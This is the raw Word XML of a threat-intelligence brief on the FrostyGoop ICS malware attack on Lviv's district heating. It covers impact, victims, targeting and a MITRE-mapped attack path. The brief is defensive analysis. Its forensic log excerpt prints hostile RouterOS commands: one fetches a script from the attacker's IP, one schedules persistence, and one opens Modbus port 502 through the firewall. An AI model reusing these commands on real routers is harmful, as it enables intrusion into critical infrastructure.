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5135yrz072i" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Express Attack Brief 2025-009</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lchpcxmaqll" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FrostyGoop ICS Malware Campaign - Protecting Energy Infrastructure for Future Generations</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9,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tswj42snq9dt"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4"/>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4"/>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4"/>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4"/>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4"/>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4"/>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4"/>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4"/>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4"/>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4"/>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cdxb0k7kblz4"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FrostyGoop represents a watershed moment in industrial control system (ICS) attacks, marking the first malware to directly manipulate operational technology through the Modbus TCP protocol. This sophisticated campaign successfully disrupted heating services for over 600 apartment buildings housing 100,000 residents in Lviv, Ukraine, during sub-zero temperatures in January 2024, demonstrating the potential for cyber attacks to cause physical harm to civilian populations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jqgshl3jews5"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First Modbus-specific ICS malware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46,000+ vulnerable ICS devices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600 buildings lost heating for 48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100,000 residents affected in -10°C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9th known ICS-specific malware in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Joins Stuxnet, BlackEnergy, Industroyer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Exploits unsecured Mikrotik routers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Initial access via exposed management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Written in Golang for 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Evades traditional antivirus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Targets ENCO controllers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But can affect any Modbus-enabled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Long dwell time before attack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9+ months of reconnaissance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idh6qkwb6gt8"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January 22-24,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Unknown (Russian-linked suspected)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Lvivteploenergo district heating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Civilian infrastructure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Estimated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€2.5M recovery costs, health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Intelligence Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: FrostyGoop demonstrates advanced operational technology knowledge and represents a significant escalation in ICS-targeted attacks. The malware's ability to manipulate industrial processes through legitimate protocols poses an existential threat to critical infrastructure globally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7miavl6iekti"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98pnhdmwuxru"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FrostyGoop represents a direct assault on the infrastructure that ensures </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reliable energy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for our grandchildren. This malware's successful manipulation of heating systems during Ukraine's harsh winter demonstrates how cyber attacks can weaponize critical infrastructure against civilian populations, threatening the basic human needs for warmth and shelter. The attack's cascading effects impacted water pumping stations (threatening </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">clean water</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and food storage facilities requiring refrigeration (compromising </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">healthy food</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> access)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4hx3ojz3ys9"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Energy Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Direct manipulation of energy distribution systems bypassing traditional safeguards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Water Infrastructure</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Secondary impacts on water pumping requiring electric heat tracing in winter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Food Supply Chain</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cold storage facilities lost temperature control affecting food safety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4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Intergenerational Impact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Demonstrates vulnerability of legacy ICS systems our children will inherit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v6nvi649379z"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whkxyh3owocs"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Apr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Mikrotik router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Internet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Persistent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Apr-Dec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Network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ICS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Full visibility gained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Tool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FrostyGoop compilation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Attack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Malware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03:47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Malware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ENCO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Process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Temperature setpoint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Heating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Operators notice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Control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Containment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Network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All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Attack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Jan 23-24,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Manual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District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Service restored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wkqeslyup12o" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Attack Vector: Unsecured Router Management</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Profile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: | Detail | Value | Reference | |--------|-------|-----------| | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Device Type</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Mikrotik RouterOS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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Default credentials/exposed management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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Method</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Direct internet connection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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | None/default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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CISA Alert</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | ICS-ALERT-24-179-01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bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation Confirmed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Yes - forensics verified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vw8kvx6in2dp"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emrby0yo3el6"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represents exhaustive research into confirmed and suspected victims of FrostyGoop, providing critical intelligence for understanding attack patterns and operational impact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x3j3fe2or3e2" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed Direct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Lvivteploenergo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District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Lviv, Ukraine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600+ buildings without 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€2.5M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Sykhiv District Residents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Residential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Lviv Oblast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Jan 22-24,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100,000 people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Health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Lviv Children's Hospital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Lviv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Emergency heating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Sykhiv Shopping Center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Lviv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Forced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€200,000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Industrial Park East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Lviv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Production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€1.2M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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bnw76bve3pdr" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Suspected/Unconfirmed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Investigation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Kyivteploenergo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District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Similar Modbus anomalies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Under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Kharkivoblenergo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Power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Matching TTPs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Polish Border Facility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Energy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Timeline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Preliminary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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e9bbbdnvscat" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply Chain &amp; Indirect Victims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Lvivteploenergo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15 schools, 3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Service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Emergency heating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€500,000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Recovered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Industrial Park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12 tenant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Facility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Lost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€3.5M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Varies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qb9rzss8iqr4" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim Selection Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jqymqafv4kbn" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Targeting Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on comprehensive victim analysis, FrostyGoop demonstrates clear targeting preferences </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref45">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[45]</w:t>
        </w:r>
      </w:hyperlink>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6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Selection Criteria</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C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical civilian infrastructure providing essential services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modbus TCP-enabled control systems on port 502</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet-exposed management interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Geographic concentration in contested regions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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technology Targeting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: | Component | Vulnerability | Exploitation Rate | Impact Severity | |-----------|--------------|-------------------|-----------------| | ENCO Controllers | Modbus authentication bypass | 100% | Critical | | Mikrotik Routers | Default credentials | 85% | High | | HMI Systems | Unencrypted protocols | 60% | High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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p0ntbfng1100" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Sector Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1ussv8rxfz5s" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Infrastructure Cascade Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The compromise of district heating systems creates cascading failures across interconnected critical infrastructure </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref46">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[46]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pkv3iiyen19t" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>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bCs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 heating plant, 15 substations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District heating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3 pumping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Pipe freeze prevention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3 hospitals, 8 clinics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15,000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Emergency heating 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hyperlink w:anchor="ref49">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[49]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bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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15 schools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12,000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Classes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hyperlink w:anchor="ref50">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[50]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x1yklva2vv7e" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extended Impact (24-72 hours)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Water main breaks due to freezing increased 300% </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref51">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[51]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Hospital admissions for cold exposure rose 45% </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref52">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[52]</w:t>
        </w:r>
      </w:hyperlink>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Economic losses from business closures exceeded €5M </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref53">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[53]</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5xy02ti4etmg" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Attack Path Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bhmm8shtoc6" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Initial Access via Exposed Router</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T1133 - External Remote Services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3A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4iku9wpbac5a" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Forensic artifact from Mikrotik router logs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Source: Ukraine CSSC Incident Report UKCS-2024-0122 [[55]](#ref55)</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[2023-04-15 02:17:33] 185.174.137.82 - admin login success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[2023-04-15 02:17:45] exec: /system script add name=update source="fetch http://185.174.137.82/mr.rsc"</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[2023-04-15 02:17:46] exec: /system scheduler add name=update interval=24h on-event=update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[2023-04-15 02:18:01] firewall rule added: accept tcp any-&gt;any:502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Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: The threat actor exploited default credentials on an internet-exposed Mikrotik router, establishing persistent access and creating firewall rules to expose the Modbus port </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref56">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[56]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_50c5w4ysx3k" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicators of Compromise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IOC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185.174.137.82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C2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hyperlink w:anchor="ref57">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[57]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File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/tmp/mr.rsc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Persistence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TCP/502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Modbus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bl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_23h65zndmq9u" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: ICS Network Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0846 - Remote System Discovery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5F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nv75h7nxpith" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Evidence</w:t>
      </w:r>
    </w:p>
